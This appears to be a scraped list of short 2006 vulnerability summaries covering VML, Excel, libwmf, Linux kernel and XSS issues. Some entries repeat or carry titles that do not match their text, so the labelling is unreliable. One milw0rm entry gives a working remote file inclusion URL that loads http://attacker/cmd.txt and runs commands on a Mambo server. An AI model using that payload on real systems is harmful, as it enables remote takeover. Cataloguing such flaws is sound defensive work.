Internet Explorer VML rect fill buffer overflow
Added: 09/20/2006. CVE: CVE-2006-4868. BID: 20096. OSVDB: 28946. Background: Vector Markup Language (VML) is an XML-based format for vector graphics. Problem: A buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long fill parameter within a rect tag...
CVE-2006-4868
Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter...
CVE-2006-4868
CVE-2006-4868: A stack-based buffer overflow in VGX.dll (VML processing) used by Microsoft Outlook and Internet Explorer on Windows XP SP2 enables remote code execution via a crafted VML rect tag with a long fill parameter. Affected: Internet Explorer/VML handling. Impact per sources: arbitrary c...
e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting
source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user i...
Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion
pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
RHEL 4 : libwmf (RHSA-2006:0597)
Updated libwmf packages that fix a security flaw are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Libwmf is a library for reading and converting Windows MetaFile vector graphics (WMF). Libwmf is us...
security flaw
Buffer overflow in the xcf_load_vector function in app/xcf/xcf-load.c for gimp before 2.2.12 allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via an XCF file with a large num_axes value in the VECTORS property...
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
/ $Id: raptorprctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ raptorprctl2.c - Linux 2.6.x suiddumpable2 logrotate Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...
Microsoft Excel COLINFO Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel OBJECT Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel LABEL Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...
libwmf integer/heap overflow
Sorry I don't have time to chase down multiple email addresses of alleged developers; so here this is after weeks of no response. POC is not attached unlike advisory says. It's not very difficult to exploit. ++++++++++++++++++++++++++++++++++++++++++++ Subject: libwmf integer/heap overflow...
Directory traversal
Unspecified vulnerability in pinball 0.3.1 allows local users to gain privileges via unknown attack vectors that cause pinball to load plugins from an attacker-controlled directory while operating at raised privileges...
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...
Windows Software Restriction Policy Protection Bypass
Windows Software Restriction Policy Protection Bypass Class: Protection bypass Vector: Local Tested on: Windows XP SP2, Windows Server 2003 SP1 Risk: Low Remark: I don't know, what is it - bug or feature, but I can't find any documentation on this issue. Description: Software Restriction Policies...
CVE-2006-2711
Secure Elements Class 5 AVR (aka C5 EVM) 2.8.1 and earlier, and possibly later 2.8.x releases, uses the same initialization vector and key for each message session, which allows remote attackers to obtain potentially sensitive information about messages...
Code injection
Secure Elements Class 5 AVR (aka C5 EVM) 2.8.1 and earlier, and possibly later 2.8.x releases, uses the same initialization vector and key for each message session, which allows remote attackers to obtain potentially sensitive information about messages...